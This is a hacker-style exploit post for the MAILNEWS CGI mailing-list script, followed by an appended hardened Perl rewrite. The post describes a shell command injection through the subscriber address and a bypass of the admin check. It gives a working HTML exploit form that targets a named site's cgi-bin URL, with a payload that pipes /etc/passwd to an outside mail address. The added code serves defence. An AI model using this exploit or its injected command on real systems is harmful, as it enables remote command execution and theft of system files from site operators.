Hello BuGReaders...

##Script: mailnews.cgi

##Introduction:
<cat from source>
CGI-Script MAILNEWS 1.3
This script helps you to maintain a mailinglist.
</cat>

##Tested Version: 1.1, 1.3

The author doesn't parse some characters and he uses a very stupid "password protection". We can add or delete users from the mailing list without knowing the admin password. But this is a small problem ;] . Let's see what more we can do.

<cat source>
open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
</cat>

where $mailprog [default] is sendmail and $member is a user from the users file. Because $member is interpolated into a command string that is opened as a pipe, whatever is stored as the address is passed to the shell. Now we can do something like this: add the user "; cat /etc/passwd | mail [EMAIL PROTECTED]" and use the subroutine to execute this code :]

Simple exploit in html:

<HTML>
<BODY>
<FORM ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST>
<INPUT type=hidden NAME="action" value="subscribe">
<BR>
User to add with ; [ex:" ; cat /etc/passwd |mail [EMAIL PROTECTED]" without quotes of course ]<INPUT NAME="address" TYPE="TEXT">
<INPUT TYPE="SUBMIT" VALUE="Submit">
</FORM>
<BR>
<A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news"> Execute command :] </A>
<CENTER> Peace... </CENTER>
</BODY>
</HTML>

Who : Kanedaaa [EMAIL PROTECTED]

***$$$### " And maybe very many will not understand these words... But there is no mercy for SONS OF BITCHES .... " ###$$*

[EMAIL PROTECTED]
Hero ... Boss ... Abuser ... Cucumber Team Member... Bzz..
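A hardened form of the `open (MAIL, "|$mailprog $member")` call quoted above, as an added example that is not code from the post or from the MAILNEWS script. The sendmail path, the helper names `valid_address` and `open_mail_pipe`, and the address pattern are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed path; the post only says the default $mailprog is sendmail.
my $mailprog = '/usr/sbin/sendmail';

# Conservative allow-list for a subscriber address (an assumption, not a full
# RFC 5322 parser). \A and \z anchor the whole string, so an embedded newline
# or trailing text cannot slip past, and the first character must be
# alphanumeric so the value can never be read as a command-line option.
sub valid_address {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    return $addr =~ /\A[A-Za-z0-9][A-Za-z0-9._%+-]*\@[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?\z/
        ? 1 : 0;
}

# Replacement for the string-form pipe open. Call valid_address() both when a
# subscription is stored and again here, because the users file may already
# hold entries written before the check existed.
sub open_mail_pipe {
    my ($member) = @_;
    die "rejected address in users file\n" unless valid_address($member);
    # List-form pipe open: Perl executes $mailprog directly with these
    # arguments, so no shell ever interprets $member. "--" ends option parsing.
    open(my $mail, '|-', $mailprog, '-oi', '--', $member)
        or die "Can't open $mailprog: $!\n";
    return $mail;
}

# Demonstration on constructed sample inputs; sendmail is not invoked here.
unless (caller) {
    my @samples = (
        'alice@example.org',
        'bob@example.org; echo injected',
        '-bp@example.org',
        "eve\@example.org\nextra",
    );
    for my $addr (@samples) {
        (my $shown = $addr) =~ s/\n/\\n/g;
        printf "%-34s %s\n", $shown, valid_address($addr) ? 'accept' : 'reject';
    }
}
```

The list-form open removes the shell from the picture and the allow-list keeps hostile strings out of the users file; neither addresses the missing admin authentication the post also mentions.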